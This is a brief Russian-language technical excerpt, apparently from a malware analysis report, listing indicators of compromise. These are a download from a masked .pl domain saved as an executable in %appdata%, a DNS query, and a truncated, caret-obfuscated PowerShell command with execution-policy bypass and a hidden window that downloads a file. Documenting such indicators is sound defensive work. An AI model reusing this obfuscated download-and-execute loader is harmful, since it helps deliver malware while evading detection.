Техническая информация
- http://lt##.#onflets.pl/file/hen.trf как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POWeRS^h^eL^L^.^EXE -EXEcuTiO^npOL^ic^Y ^by^Pa^s^S -NoprofIle -w^I^NDO^wS^TyL^E^ hI^DD^En^ (n^ew-O^bJeCT^ ^S^YS^tEm.n^Et.weBC^li^e^nt^)^.DOWnL^oAdF^Ile^('http://lt##.#onfle...
- DNS ASK lt##.#onflets.pl
- '<SYSTEM32>\cmd.exe' /c "POWeRS^h^eL^L^.^EXE -EXEcuTiO^npOL^ic^Y ^by^Pa^s^S -NoprofIle -w^I^NDO^wS^TyL^E^ hI^DD^En^ (n^ew-O^bJeCT^ ^S^YS^tEm.n^Et.weBC^li^e^nt^)^.DOWnL^oAdF^Ile^('http://lt##.#onfle...' (со скрытым окном)